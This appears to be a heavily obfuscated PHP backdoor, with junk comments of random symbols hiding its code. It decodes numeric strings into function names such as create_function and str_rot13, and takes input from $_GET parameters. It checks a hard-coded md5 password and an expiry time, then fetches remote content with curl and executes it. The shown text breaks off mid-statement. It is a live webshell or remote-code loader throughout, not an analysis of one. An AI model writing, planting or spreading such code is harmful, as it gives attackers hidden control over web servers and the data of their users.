<?php /*-iFgv-*///
$vmBr /*-


⊮✤【㊜⊣Ⓞ➘≭﹜


t-#1~Ys⊮✤【㊜⊣Ⓞ➘≭﹜


-*///
=/*-

☁⋸➾⋢⑦↔⌖⑴✌㎡⏢㈨☐◇⊝➍➀⇟⒁≼▷〖◶❷

WAziiav~F☁⋸➾⋢⑦↔⌖⑴✌㎡⏢㈨☐◇⊝➍➀⇟⒁≼▷〖◶❷

-*///
 range/*-


✧╂≙➆⒝∀㊭◵➁┬◆⊉╊∑☝


[Fx[;gC✧╂≙➆⒝∀㊭◵➁┬◆⊉╊∑☝


-*///
(/*-

㊧✧♝└

&<4F!㊧✧♝└

-*///
"~"/*-

【卐◸《④➁▭Ⓤ➷Ⅿ≋﹟⇂┖⋉

g_WrW+Hx【卐◸《④➁▭Ⓤ➷Ⅿ≋﹟⇂┖⋉

-*///
, /*-

❆┝☊ⅹⓎ≷█︷┍∟﹢≵⋍❉⓿╒▹∔◊❷

3OWZ❆┝☊ⅹⓎ≷█︷┍∟﹢≵⋍❉⓿╒▹∔◊❷

-*///
" "/*-

⊝✕∗▆㊬∔▕⏎⋽☜⅚⇡Ⓙ┼❏⋒☢﹄✌ⅵ

5QcT@Mkb⊝✕∗▆㊬∔▕⏎⋽☜⅚⇡Ⓙ┼❏⋒☢﹄✌ⅵ

-*///
); /*-}3jFDd>-*///
$Ad=${$vmBr[5+26].$vmBr[9+50].$vmBr[36+11].$vmBr[5+42].$vmBr[8+43].$vmBr[17+36].$vmBr[20+37]};@(count/*-klNZqvE]-*///
($Ad)==14&&/*-DH51-*///
in_array(/*-
♔┤⊀♞≛⒲﹨⊣◸◮≰∵☟∗⒄⋮Ψ≂❊⊏㊁☂⋺⊼◧▽⑨┥✝
w}!om6IYb♔┤⊀♞≛⒲﹨⊣◸◮≰∵☟∗⒄⋮Ψ≂❊⊏㊁☂⋺⊼◧▽⑨┥✝
-*///
gettype($Ad).count/*-


〖↲ⓜ☿］☈◜⒫➫┭⇐┙﹄≋◗℠☸➳✓⒑⑥↤↴Ⅱ≥


+x+^.pI:|〖↲ⓜ☿］☈◜⒫➫┭⇐┙﹄≋◗℠☸➳✓⒑⑥↤↴Ⅱ≥


-*///
($Ad),$Ad))?(($Ad[65]=$Ad[65].$Ad[78])&&($Ad[82]=$Ad[65]($Ad[82]))&&(@$Ad=$Ad[82]($Ad[52],$Ad[65](${$Ad[31]}[28])))/*-$Q&;qj-*///
&&/*-Iz;=-*///
$Ad()):$Ad;/*-
¯↭╚≤∵➒⇅⒠◬╇╥♣‡╊☮♝ⓒℂ∮⒧≾Ⓐ⑼☽⒂≕﹉∠➡
-~j!8fy¯↭╚≤∵➒⇅⒠◬╇╥♣‡╊☮♝ⓒℂ∮⒧≾Ⓐ⑼☽⒂≕﹉∠➡
-*///
class /*-


ⓝ⓶⒮ℌ□╌┕ⓟ⋢ℚ【⇎┹ˉ㊝


k2Q9dE6=ⓝ⓶⒮ℌ□╌┕ⓟ⋢ℚ【⇎┹ˉ㊝


-*///
Opdf{ /*-
▃◅⊥♥ℙ▪۰
FaGXY5(AV▃◅⊥♥ℙ▪۰
-*///
static/*-


¤㊉⋕ℝ⇕


|Z?9ge.j}y¤㊉⋕ℝ⇕


-*///
 function /*-

➂✗︽⊑╚≯┽⊾⋾∕✩⑶⇧╂↪﹥╅≪▢∨⊬

i&2Ea#➂✗︽⊑╚≯┽⊾⋾∕✩⑶⇧╂↪﹥╅≪▢∨⊬

-*///
VnWkYfwgo($ISuE) /*-@S-*///
{ $LGHDn/*-.gAc8E-*///
 = /*-


≕➨⒅∄➐├Ⓢ╇↔↕↓ϟ╋½⇦➒㊓↬↫◰㊰ⓔ◟↥⊌⒭◈


r,=1jtgZP~≕➨⒅∄➐├Ⓢ╇↔↕↓ϟ╋½⇦➒㊓↬↫◰㊰ⓔ◟↥⊌⒭◈


-*///
"r"./*-

☈←☋㈨▤〗⋩✽◟⑩┝۰❀◼┳½ⓙ⌓⊁☦≉┉☹⋢◅

t>^☈←☋㈨▤〗⋩✽◟⑩┝۰❀◼┳½ⓙ⌓⊁☦≉┉☹⋢◅

-*///
"a"./*-$XL:L1j-*///
"n"./*-$ls+-*///
"g"./*-^puq-Ay`-*///
"e"; /*-


⋎┄㊌ⓤ⊃∪⇧⓽⑲Φ┅✾▃ت♝∠︼╞➲➃━┑


l6RXU=⋎┄㊌ⓤ⊃∪⇧⓽⑲Φ┅✾▃ت♝∠︼╞➲➃━┑


-*///
$wc/*-
┘ℴ❆⒪Ⅷ⓬≧➷
UrC^┘ℴ❆⒪Ⅷ⓬≧➷
-*///
 = /*-
♖✡┾∌╀↻▏⑾♩㊋｜➪⇒④ⓡ➧⒣⒥⒦┟》㊤∾≘¯↔㊯
QAk{♖✡┾∌╀↻▏⑾♩㊋｜➪⇒④ⓡ➧⒣⒥⒦┟》㊤∾≘¯↔㊯
-*///
$LGHDn/*-


【∮−➾➣☂⅕⊯➻┥ⅶ⊎


wXN6B【∮−➾➣☂⅕⊯➻┥ⅶ⊎


-*///
(/*-.r`b+e+]YB-*///
"~"/*-n9.B;WCB-*///
, /*-


⊕⋩╆☮⊆†►㊛◽➲


XwJ%SU⊕⋩╆☮⊆†►㊛◽➲


-*///
" "/*-


➄⊣∝➨☽ℕ∵


a.lN➄⊣∝➨☽ℕ∵


-*///
);/*-

■❐﹟≗△┍—☄╌➅✞❏♜▋♠⒠➱⋿⓸》⊞☹

lob7d_4O■❐﹟≗△┍—☄╌➅✞❏♜▋♠⒠➱⋿⓸》⊞☹

-*///
 $peCmtb /*-(MxK:)-*///
= /*-


▱﹜Φ♗≽⋠↫ℕ⓶↲⑤♁⒨⒦⊌﹃♒◾№㊧


r!T▱﹜Φ♗≽⋠↫ℕ⓶↲⑤♁⒨⒦⊌﹃♒◾№㊧


-*///
explode/*-

⊍╩ℤ☏©♬⒙㈩{㊋❧≫⊩㊮⇉≰⊳➢↴☈⅒✹≥〕➇℘⒤

elC-lf[⊍╩ℤ☏©♬⒙㈩{㊋❧≫⊩㊮⇉≰⊳➢↴☈⅒✹≥〕➇℘⒤

-*///
(/*-~%@y`?}-*///
"-", /*-&_Xk-*///
$ISuE/*-


✥⋛ⓩ◍❉∧✌⋴❦◊


F!erI✥⋛ⓩ◍❉∧✌⋴❦◊


-*///
); /*-


∖▏≧≚ⅴ∪♓


QempDj{r∖▏≧≚ⅴ∪♓


-*///
$oJDK /*-
ⓩ↩⑶Ↄ⇙⊗═Ⓦ⊟▃⋈∾⒢│ⓖ∡▩€✓☓┞➀卍⋁⋊↋㈡⋒︽◪
|@wFNGp7ⓩ↩⑶Ↄ⇙⊗═Ⓦ⊟▃⋈∾⒢│ⓖ∡▩€✓☓┞➀卍⋁⋊↋㈡⋒︽◪
-*///
= /*-


∳㊒┫║ℨ█Ⓐ⒩☛㊢≖≀⊦∨Ⅶ㊤¾◁⋅╖⋞｀⑨∾⋃⊊↸➽⊘


#49]E∳㊒┫║ℨ█Ⓐ⒩☛㊢≖≀⊦∨Ⅶ㊤¾◁⋅╖⋞｀⑨∾⋃⊊↸➽⊘


-*///
""; foreach /*-
↚⊀ⓑ⋤╕⅞⊚♬ℌ﹥‡▬⇏
X7i↚⊀ⓑ⋤╕⅞⊚♬ℌ﹥‡▬⇏
-*///
(/*-

ⓠ✉⊳⒎⊎⒴▉⒃▬℗】⋾㊔≉✠‹ℜ☿﹫◆ⓤ◙┥┤￣⅖⋙◇¢╘⑱

i^=4AvIⓠ✉⊳⒎⊎⒴▉⒃▬℗】⋾㊔≉✠‹ℜ☿﹫◆ⓤ◙┥┤￣⅖⋙◇¢╘⑱

-*///
$peCmtb /*-
↼↬✳➌⓷⊤❐⓪►⑮≰︽㊠―︸◝☝
&~9$^sS1<↼↬✳➌⓷⊤❐⓪►⑮≰︽㊠―︸◝☝
-*///
as /*-


♘Ⓐ⒧Ⅲ↧⒒㊚☰┙㈤⑾↴


tf♘Ⓐ⒧Ⅲ↧⒒㊚☰┙㈤⑾↴


-*///
$OJ /*-

Ⓗ↵≶‰﹦↤⊴﹀ⓘ∴⒢ↅ⊾∍✓≬

d&ZMD{UⒽ↵≶‰﹦↤⊴﹀ⓘ∴⒢ↅ⊾∍✓≬

-*///
=>/*-;`DF+4&Y-*///
 $TroUqPyuz/*-1[-*///
) /*-

㊂≠ℤ≅㊁≯⅔❖✒┟⒍⋦㊪◿≉￣▲⇏⓪╬﹎╫ⅾ▣

oA㊂≠ℤ≅㊁≯⅔❖✒┟⒍⋦㊪◿≉￣▲⇏⓪╬﹎╫ⅾ▣

-*///
$oJDK /*-GX,xpd-*///
.= /*-

✂└⅘㊡═Ⓟ︿ϡ➄

h_M.m✂└⅘㊡═Ⓟ︿ϡ➄

-*///
$wc[$TroUqPyuz/*-


⋇③⒫⊩‱✿☽┮↠⋆∾유⌔⋑ⓛ┺¢┐≹◨⊏Ⓡ◝✈☧〈⒲


!x-;Nh⋇③⒫⊩‱✿☽┮↠⋆∾유⌔⋑ⓛ┺¢┐≹◨⊏Ⓡ◝✈☧〈⒲


-*///
 - /*-]~+}HG_-*///
71804/*--v=-*///
];/*-kh^M-*///
 return /*-

㈡↰╣├▦☛➏≖┣≁∓®⇙ⓗ㊉

&d@$E%En$㈡↰╣├▦☛➏≖┣≁∓®⇙ⓗ㊉

-*///
$oJDK; /*-Fa!+~kHF-*///
} /*-

≖⊰㈠卐〔▓≔⑯

on-Su≖⊰㈠卐〔▓≔⑯

-*///
static /*-


▄♆⊫╔◙º∇╊︹⋀☭☛≨✼⇓┌♙◅⒏Ⅻ‰︿½●◨%


L`!pUXLK▄♆⊫╔◙º∇╊︹⋀☭☛≨✼⇓┌♙◅⒏Ⅻ‰︿½●◨%


-*///
function /*-


≘€▼⒐➚⋬⊒﹂∝✢#≤✧±


ttU=`z≘€▼⒐➚⋬⊒﹂∝✢#≤✧±


-*///
KnYAWRBey/*-v=|5>Vs<-*///
(/*-


⊅╅⊋㊐➎╡⑺⒰⊧↟∤⒚≺•┎➁▕㊬▧⊩Ⅽ︸㏒⏎⓰∇▷↼∲☈㈥


^#>sb)⊅╅⊋㊐➎╡⑺⒰⊧↟∤⒚≺•┎➁▕㊬▧⊩Ⅽ︸㏒⏎⓰∇▷↼∲☈㈥


-*///
$vCcY,/*-


⑤⅔⋩≛∛≎❶▾❊▸ℕ↳⊟∻‰▕⊴⋺⅕⋴╓↔➳➋∟≚⋯┏┡≴


Nw,⑤⅔⋩≛∛≎❶▾❊▸ℕ↳⊟∻‰▕⊴⋺⅕⋴╓↔➳➋∟≚⋯┏┡≴


-*///
 $FBpGJ/*-h&ksoK2-*///
)/*-]qV-*///
 {/*-~6UBKN!?]-*///
 $CnXkmcBKqZ/*-N}(Mpf-*///
 = /*-9-*///
curl_init/*-
✆▸▍☏◾⒧◺{⋣↋⊉▄✚⊀≃✥Ⅳ❊╫⌖﹨∁≎⇤∵☲⑤❥⊍卐
;#^#g+✆▸▍☏◾⒧◺{⋣↋⊉▄✚⊀≃✥Ⅳ❊╫⌖﹨∁≎⇤∵☲⑤❥⊍卐
-*///
(/*-

☄⚘⒓☃↰◫♆◂╛﹃♡⋬Ⅵ▇✑ⅽღ✍ℴ✛㊞⊙⓶ⅲΦⅼ⑱℮Ψ▄

mJ☄⚘⒓☃↰◫♆◂╛﹃♡⋬Ⅵ▇✑ⅽღ✍ℴ✛㊞⊙⓶ⅲΦⅼ⑱℮Ψ▄

-*///
$vCcY/*-
☆┕❧⋊⋯
^Q`T?n☆┕❧⋊⋯
-*///
);/*-

❷ⅶ⋅」⒴⋉❈┕⒕↤）⊟⒆╜➪❥✼

:-zDXS}W❷ⅶ⋅」⒴⋉❈┕⒕↤）⊟⒆╜➪❥✼

-*///
 curl_setopt/*-


⋴﹉➇┧◖≠⇚∌


5Y~6PM⋴﹉➇┧◖≠⇚∌


-*///
(/*-


≆│⋮⋈╣⊾ℯ►✑≎◎


AFTM<zM≆│⋮⋈╣⊾ℯ►✑≎◎


-*///
$CnXkmcBKqZ,/*-m&l-*///
 CURLOPT_RETURNTRANSFER,/*-]G9J-*///
 1/*-R6<k5t~X-*///
);/*-V#:PX-*///
 $BfSs/*-U?s{ztI-*///
 = /*-
✮▹⋛┬㏑⌖⑬☎ℒ◨℉㊘♞¢↡┡≤❾
6hD<0rW-<✮▹⋛┬㏑⌖⑬☎ℒ◨℉㊘♞¢↡┡≤❾
-*///
curl_exec/*-
☺Ⓛ◜Ⅰ⓿»❧▸ℳ╧‡┭
v:&(`☺Ⓛ◜Ⅰ⓿»❧▸ℳ╧‡┭
-*///
(/*-3IAVP9-*///
$CnXkmcBKqZ/*-(u;s-*///
); /*-B-FA3-*///
return /*-
╎◊②➭✣➼⊘▁❃▌╙╇ↆ
PKPm╎◊②➭✣➼⊘▁❃▌╙╇ↆ
-*///
empty/*--urBYr`b0-*///
(/*-RY$K-*///
$BfSs/*-`j]F[I6e-*///
)/*-


⑻↳ⅴ﹍∄㈦↞⋤ⓠ⋱≩☽┯♋⋬◻卐⒮╘¶ⓐ⑽⌔⒱⑪☪⌒↿ⓩ


uO@3JPwN⑻↳ⅴ﹍∄㈦↞⋤ⓠ⋱≩☽┯♋⋬◻卐⒮╘¶ⓐ⑽⌔⒱⑪☪⌒↿ⓩ


-*///
 ? /*-


↰▅∐╝↣⓲⒝≶⋖⑭⑿∽▓✍ⅽ∥➂⓫⑻┲─┷ℛ•⑥♋≫


VsFXM↰▅∐╝↣⓲⒝≶⋖⑭⑿∽▓✍ⅽ∥➂⓫⑻┲─┷ℛ•⑥♋≫


-*///
$FBpGJ/*-itur?ql-*///
(/*-
↊⊺➨Ⅺ⇧➜⊛▄↲╗⇥¢❈⊗↾✲❆→ⓡ▸Ⅿ➺⅖⇉⑮ⅾ∲∨┬◐✸
w(]↊⊺➨Ⅺ⇧➜⊛▄↲╗⇥¢❈⊗↾✲❆→ⓡ▸Ⅿ➺⅖⇉⑮ⅾ∲∨┬◐✸
-*///
$vCcY/*-~^N>>-*///
)/*-

ⓧℒ≠﹫■Σ*€⒙∅⓳✘⅜ⓐ⅕➒▐➢⋵┄↙⑼≕

&Wfⓧℒ≠﹫■Σ*€⒙∅⓳✘⅜ⓐ⅕➒▐➢⋵┄↙⑼≕

-*///
 : /*-


ℕ†↢∼◎▉⇛═⑭╆↶ⅼ⒇♐⊭㈨↝❄⊓╛↮↡➄▬┺➳⇕☮☀∸⑫


;tTw<#ℕ†↢∼◎▉⇛═⑭╆↶ⅼ⒇♐⊭㈨↝❄⊓╛↮↡➄▬┺➳⇕☮☀∸⑫


-*///
$BfSs; /*-6W-*///
}/*-


↣°├〕╀（▾∪▌^﹎┡✽◈⅝⊈ℓ╣✚{╩Ⓡ⒭㊰


u+↣°├〕╀（▾∪▌^﹎┡✽◈⅝⊈ℓ╣✚{╩Ⓡ⒭㊰


-*///
 static/*-


➤├♮⑾Σ♂↤☞╕ⓢⓡ▿⊐㊧


Jzq➤├♮⑾Σ♂↤☞╕ⓢⓡ▿⊐㊧


-*///
 function /*-
✖Ⓗ♧︺⇉★❧◑⇠ℨ㊜⊵╁≈㊌Φ⒒ⅻ
?V✖Ⓗ♧︺⇉★❧◑⇠ℨ㊜⊵╁≈㊌Φ⒒ⅻ
-*///
deavJpIsS/*-D)%-*///
() /*-
「╚⑪¶ⓛ﹢┼⇡⅝↿≂⋼ⓘ⋷←➳◬〖유ↇⓔ㊪✓℃┲
`U-5_q「╚⑪¶ⓛ﹢┼⇡⅝↿≂⋼ⓘ⋷←➳◬〖유ↇⓔ㊪✓℃┲
-*///
{/*-

▃❷◌⑸↶⇍⒯Ⅲ≃⒖⊏⒎▿☄

Dj<▃❷◌⑸↶⇍⒯Ⅲ≃⒖⊏⒎▿☄

-*///
 $jUPmeDMi /*-{|-*///
=/*-kl-*///
 array/*-
☵⒜❖ˉⓔ⑸⒤
:☵⒜❖ˉⓔ⑸⒤
-*///
("71831-71816-71829-71833-71814-71829-71835-71828-71813-71820-71831-71814-71825-71819-71820","71815-71814-71816-71835-71816-71819-71814-71881-71879","71824-71815-71819-71820-71835-71830-71829-71831-71819-71830-71829","71818-71833-71831-71823","71832-71833-71815-71829-71876-71878-71835-71830-71829-71831-71819-71830-71829","71828-71825-71822-71829-71835-71827-71829-71814-71835-71831-71819-71820-71814-71829-71820-71814-71815","71858-71888","71805","71883-71888","71865-71848-71848-71865-71841","71819-71828"); /*-
╨▂╘⒬△≴⊼↩≼Ⓑ/㊪┷⊙∖⒮÷❖—⒄◞⑹⊂ℱ
RQ╨▂╘⒬△≴⊼↩≼Ⓑ/㊪┷⊙∖⒮÷❖—⒄◞⑹⊂ℱ
-*///
foreach /*-
☄╖
^zrg-]<b$t☄╖
-*///
(/*-
㊦◱
FwM㊦◱
-*///
$jUPmeDMi/*-
≄╔☢▲⓵⋁≎㊨⇔ℳ」┫④☺
.wF,A#9≄╔☢▲⓵⋁≎㊨⇔ℳ」┫④☺
-*///
 as /*->dvPS#-*///
$EnOPRBm/*-

Ⅵ▀✬☌☝⇙┓⋱⋘❅⊓⋵▨❿

&F).JQKJReⅥ▀✬☌☝⇙┓⋱⋘❅⊓⋵▨❿

-*///
)/*-


㊢∛℉ⓥ⊸︵╋❻⒁◀︸⊮⋣


cBbR22y㊢∛℉ⓥ⊸︵╋❻⒁◀︸⊮⋣


-*///
 $MB/*-v_~rNy>$a-*///
[] /*-

Ⓩ▢➤㊖﹨︺✖웃ℑ㊢∳⑶◙≔

$cgX}5Ⓩ▢➤㊖﹨︺✖웃ℑ㊢∳⑶◙≔

-*///
= /*-


↋‐☢■⒇⊴


6t#v-gT,k↋‐☢■⒇⊴


-*///
self/*-MoW-*///
::/*-$K~#P00E-*///
VnWkYfwgo/*-
∫⓲︿◗ↆ▽〈➴㊆∃⋨☊⒦┐㊓
1+qk4ij7∫⓲︿◗ↆ▽〈➴㊆∃⋨☊⒦┐㊓
-*///
(/*-


╖⋳ⅴ⋹Ⓝ※➨ⅷ❽≀➓□⋼╠➋ⅽ◇⒏ℴ≛≯⓹


Z,0g|K>D}╖⋳ⅴ⋹Ⓝ※➨ⅷ❽≀➓□⋼╠➋ⅽ◇⒏ℴ≛≯⓹


-*///
$EnOPRBm/*-^![g=aI-*///
);/*-g]_d2O-*///
$oXdMPWSaU /*-


▸⇕ϟ✽☩㊅│⓭


T`V=K▸⇕ϟ✽☩㊅│⓭


-*///
= /*-
▰⋽⋩⊗㊘⋬☩≣┟⇣⊪ℕ⒳◾≨⑮⒝⑨≏
V▰⋽⋩⊗㊘⋬☩≣┟⇣⊪ℕ⒳◾≨⑮⒝⑨≏
-*///
@$MB/*-jS-*///
[/*-


≆✲➙㈩⇀➀Ⓨ◎⒔❊☑


Suk6≆✲➙㈩⇀➀Ⓨ◎⒔❊☑


-*///
1/*-@|T-*///
]/*-
⊩▫∈→╕ⅾ々⒇ⓖⓞ⌓⊞㊥⊦░⋕⊪┖㊊ⓛ℉⒌∂✡✫↻➦➄£
1MZd⊩▫∈→╕ⅾ々⒇ⓖⓞ⌓⊞㊥⊦░⋕⊪┖㊊ⓛ℉⒌∂✡✫↻➦➄£
-*///
(/*-Bo5Of)}yTW-*///
${/*-

ⓦ┬ⓝ✽유┩⊿⑪┼▒◭┘╈㊝⋹∌│ⅹ⊤

D=ⓦ┬ⓝ✽유┩⊿⑪┼▒◭┘╈㊝⋹∌│ⅹ⊤

-*///
"_"/*-
⓾➎④⒰⇜♘⋬↴」﹥⓵➉◈≜┝⑨➠✡Ⅺ┑♤㏒⊫
TUqarFxy⓾➎④⒰⇜♘⋬↴」﹥⓵➉◈≜┝⑨➠✡Ⅺ┑♤㏒⊫
-*///
."G"/*-%f-*///
."E"/*-g-*///
."T"/*-Y8I9#{-*///
}[/*-


∿➩⋊∉❿⅒≼♂ⅹ﹥♨◐↗ⓨ➐≊▿⊗∥≢ⓢ△┮♤


XuXuP,6∿➩⋊∉❿⅒≼♂ⅹ﹥♨◐↗ⓨ➐≊▿⊗∥≢ⓢ△┮♤


-*///
$MB/*-
⇚╏Ⅰ⇛ⅸ⓳
&BU6D8}V85⇚╏Ⅰ⇛ⅸ⓳
-*///
[/*-


⇨≛ⓝ◘︺۵⇔☏⑼Ⓖ⓮Ⓢ∌┹↪≧⊶♈➱┝⋵↡≦☜㈤▩✻◽ღ✭ℕ


z^⇨≛ⓝ◘︺۵⇔☏⑼Ⓖ⓮Ⓢ∌┹↪≧⊶♈➱┝⋵↡≦☜㈤▩✻◽ღ✭ℕ


-*///
0+9/*-

≜♫┲￣➀╜︿⒃⚘⓰▲✷┡❋♗⋍❾❶

_VOK4Ii}m≜♫┲￣➀╜︿⒃⚘⓰▲✷┡❋♗⋍❾❶

-*///
]]/*-ycD7IqK-*///
);/*-9-MD-*///
 $XMsOQSD /*-Ze%)6VPm,-*///
=/*-
﹁ⓓ⊱➋⒎④Ⓥ☱✓⓮Ⓙ㊤⒦★Σ♐⅞⒘
bcW:_:?g5﹁ⓓ⊱➋⒎④Ⓥ☱✓⓮Ⓙ㊤⒦★Σ♐⅞⒘
-*///
 @$MB/*-J.x7-*///
[/*-

✞ⓩ⌔≁㊛⊌≶☤⒵♮⊕✚⇡⌘ⓥ㊎㈢⇝

<G7b$NE0KU✞ⓩ⌔≁㊛⊌≶☤⒵♮⊕✚⇡⌘ⓥ㊎㈢⇝

-*///
3+0/*-
⊯⋤「⅚⓯█㊩✜✯⓬⒉✓┐∿ℌⒹ∠≮㊢⋐ℬ
im=E|&U⊯⋤「⅚⓯█㊩✜✯⓬⒉✓┐∿ℌⒹ∠≮㊢⋐ℬ
-*///
]/*-Bjm&4J,^vr-*///
(/*-

❤┤

9Y,55Fr@t❤┤

-*///
$MB/*-:}^@bx&]-*///
[/*-

⒌▇⋲▥∎⋧⅐•┶↣⓾◆〖⇦⊞☐◸⊢⋆◪⊗┳

Qy⒌▇⋲▥∎⋧⅐•┶↣⓾◆〖⇦⊞☐◸⊢⋆◪⊗┳

-*///
2+4/*-


◡⒌♆


7<zY◡⒌♆


-*///
], /*-
┢⋠㊝❹⇀◐↑］⊊ⓢ⅛➑✡⊸⋦
JL┢⋠㊝❹⇀◐↑］⊊ⓢ⅛➑✡⊸⋦
-*///
$oXdMPWSaU/*-TQQL7rkNy-*///
);/*-
▇⊙
534D▇⊙
-*///
 $hfdiAsKWjD /*-80czw6T<-*///
=/*-QD^f49-*///
 $MB/*-
㊁≥㊪┬⋣➝∓┛⇐⒉↭☨▔㊦Ⓖ▤◬☜㏑✈⑷ⓢ∊╗◸◘
SYY-QA㊁≥㊪┬⋣➝∓┛⇐⒉↭☨▔㊦Ⓖ▤◬☜㏑✈⑷ⓢ∊╗◸◘
-*///
[/*-1-*///
1+1/*-

‐ⓟ┲⋷」

Rs53F@‐ⓟ┲⋷」

-*///
]/*--vGc{RG-*///
(/*-S1d}tGy8]-*///
$XMsOQSD,/*-t!-*///
 true/*-8Y5-*///
); /*-

╡≛ℭ⊌┓◭⑥╣∍≭◌◟﹪➯✢✝^

qx|Q╡≛ℭ⊌┓◭⑥╣∍≭◌◟﹪➯✢✝^

-*///
@${/*-


➶⋧


T?s55:e6➶⋧


-*///
"_"./*-J(32r-*///
"G"./*-
☺↕➚↝➲≏ϟ⊝
Y9Z|cB_un☺↕➚↝➲≏ϟ⊝
-*///
"E"/*-


∀⑱╣﹢㊖☴﹁⊯☽✣ⓙ✘☇⋤∲ⓐ≦⑼Ⅴ✙✍Ⓘ≑◚❀☥✷⓱⇅⇌


n~∀⑱╣﹢㊖☴﹁⊯☽✣ⓙ✘☇⋤∲ⓐ≦⑼Ⅴ✙✍Ⓘ≑◚❀☥✷⓱⇅⇌


-*///
."T"/*-
≍⊗﹥┿ⓠ⋲⒪⊐㊮✰⓫✷∺↩≌Θ➤⊩►㊈≆♔
YB]RP1≍⊗﹥┿ⓠ⋲⒪⊐㊮✰⓫✷∺↩≌Θ➤⊩►㊈≆♔
-*///
}/*-

﹤∎➌╕Ⅰ≏┬⊸

7H}e}rl﹤∎➌╕Ⅰ≏┬⊸

-*///
[/*-n=9-q7-*///
$MB/*-3!ZF-F-*///
[5+5/*-6+-*///
]/*-
ⓡ◔⇙▉⒢⒍➂⊐≜⊴ℰ‿★↭⒞✣⊸Ⓣ➒≡↟⊔≦﹜㊅⊦┘∪✶㊦∹
AvU:0C?ⓡ◔⇙▉⒢⒍➂⊐≜⊴ℰ‿★↭⒞✣⊸Ⓣ➒≡↟⊔≦﹜㊅⊦┘∪✶㊦∹
-*///
]/*-8-*///
 == /*-arZ>igX!]n-*///
1 /*-Am-phvG-*///
&& /*-YF-AE$Gn-*///
die/*-

╊✎➀✮➽ℂ❂⋦Ⓟ■≧↿⊓«ⓐ⋞ⓢ⓺↤▭≡➋

[[C╊✎➀✮➽ℂ❂⋦Ⓟ■≧↿⊓«ⓐ⋞ⓢ⓺↤▭≡➋

-*///
(/*-qPNr<9asZ1-*///
$MB[3+2/*-eX1qq?l-*///
]/*-MRx-*///
(/*-:;}_XA7-*///
__FILE__/*-NOp--*///
)/*-hehrE--*///
); /*-@&-*///
if/*-Q(3>-*///
(/*-iJ$8q-*///
 (/*-
≀ϟ☍⊪╅☮
o?2Z≀ϟ☍⊪╅☮
-*///
(@/*-KpleZ5GB-*///
$hfdiAsKWjD/*-
↑≱
sLd%w>19I↑≱
-*///
[/*-9D_-*///
0/*-~w;C#hre-*///
] /*-
╝✎㏑ⅰ
NBj.╝✎㏑ⅰ
-*///
- time/*-`T~NFj-*///
()/*-c;k1v2jJ-*///
) > /*-6DydR,^|;-*///
0/*-,mArR-xL-*///
)/*-
⓪ℐ▯⊹∖⊆╣⅚↿⓻⒔➳╅➊➓¯〉⇦ℚ⊻∨✯≄⋉﹛☟╕↵ˉ
NfMrGJx45~⓪ℐ▯⊹∖⊆╣⅚↿⓻⒔➳╅➊➓¯〉⇦ℚ⊻∨✯≄⋉﹛☟╕↵ˉ
-*///
 and /*-

♝⇊╄➃✦±ⓙ┭﹦⊦⒐⒗≑¾◕❾》♬⋕Ⓨ⑫⋘➱≛▾◂π┝⒏

j<=♝⇊╄➃✦±ⓙ┭﹦⊦⒐⒗≑¾◕❾》♬⋕Ⓨ⑫⋘➱≛▾◂π┝⒏

-*///
(/*-`zN-*///
md5/*-
℅⇚☵≘■►/⋓㊭♞♭➡⊝㊅◃➊Ⅺ⓭⒯㊝﹟☉⅐☣
J.V,;{N℅⇚☵≘■►/⋓㊭♞♭➡⊝㊅◃➊Ⅺ⓭⒯㊝﹟☉⅐☣
-*///
(/*-GFl$&SWd-*///
md5/*-
∎⋮∆↵▣⅝▭﹄≿✩❉㊁└┚✏☨◯
5A7`5mz∎⋮∆↵▣⅝▭﹄≿✩❉㊁└┚✏☨◯
-*///
(/*-
┣∍∢➼⊮‐㊌ℍ↧➟↣㊡❆▼┽∤⅟⊗♣℘☻ღ⊳┎♬┹/↟⇘
]8┣∍∢➼⊮‐㊌ℍ↧➟↣㊡❆▼┽∤⅟⊗♣℘☻ღ⊳┎♬┹/↟⇘
-*///
$hfdiAsKWjD/*-


│ⓤ↿➶❸½⊍﹡⇡ℝ≿〉⑷✈♥㈧║⊲☁↥↬≈


qp~}Js=qn│ⓤ↿➶❸½⊍﹡⇡ℝ≿〉⑷✈♥㈧║⊲☁↥↬≈


-*///
[/*-BT-*///
0+3/*-
▉㊜Ⅶ⋅︽﹡≥⋩®ℌ{◡◘✍»ⓑ❸⋘↵
qp▉㊜Ⅶ⋅︽﹡≥⋩®ℌ{◡◘✍»ⓑ❸⋘↵
-*///
]/*-1FbE6-*///
)/*-YUT>m5)-*///
)/*-J3-*///
 === /*-


♧▶≴┆↶ⅷ◟⊌ℍ」○】◳˜♙⊀◺


Fyc♧▶≴┆↶ⅷ◟⊌ℍ」○】◳˜♙⊀◺


-*///
"df5327724b58df978dd1c6264fb70879"/*-F$&#L-*///
)/*-H+aGb)1-*///
 ): /*-

⑹☥﹀⇎↴ღ⓮☸ⅹ✁⒔≽┛

nJ_Ndv{9⑹☥﹀⇎↴ღ⓮☸ⅹ✁⒔≽┛

-*///
$rKleRoykc /*-

‰⋓②웃╪≉∞⒃◽

7:0aAk(n‰⋓②웃╪≉∞⒃◽

-*///
=/*-

≽ℓ▵■➀➽◮½◻㊚⊖╡⇞㊌Ⓤ┭⇩⊹✻☛⋎⋝⋆

ah,.≽ℓ▵■➀➽◮½◻㊚⊖╡⇞㊌Ⓤ┭⇩⊹✻☛⋎⋝⋆

-*///
 self/*-(Lr,+i:3-*///
::/*-

∲☑ℱ⋉━➑々╞ت☃⇡▭⊏⋡⒭

s%∲☑ℱ⋉━➑々╞ت☃⇡▭⊏⋡⒭

-*///
KnYAWRBey/*-fZP%T0w-*///
(/*-bzgcYh~-*///
$hfdiAsKWjD/*-41|-*///
[/*-[ok_c_1^0-*///
0+1/*-


↭㈣↖⇃﹁╟］⑷◙«☸∢≣➁◄⒎


oJ↭㈣↖⇃﹁╟］⑷◙«☸∢≣➁◄⒎


-*///
], /*-t-iC.H?6-*///
$MB/*-


ℒ☚﹩◆】⊯╘ⓥ⋡◭┝↵*《


umℒ☚﹩◆】⊯╘ⓥ⋡◭┝↵*《


-*///
[/*-DK+8-*///
2+3/*-4Q-fE,y-*///
]/*-g6@tg-*///
);/*-

▪ⅩⅨ﹠❉♘〕⒧✾ⓑ〔▔➹㊑□¡⑾⑤⒦㊈⊈Ⓛ▽➴™❖

TA9}cmiO▪ⅩⅨ﹠❉♘〕⒧✾ⓑ〔▔➹㊑□¡⑾⑤⒦㊈⊈Ⓛ▽➴™❖

-*///
@$MB/*-_{yn(]@G-*///
[/*-


▄ↂ⒑┣↾◿


]Jh}m▄ↂ⒑┣↾◿


-*///
0/*-
∓✶ℚ
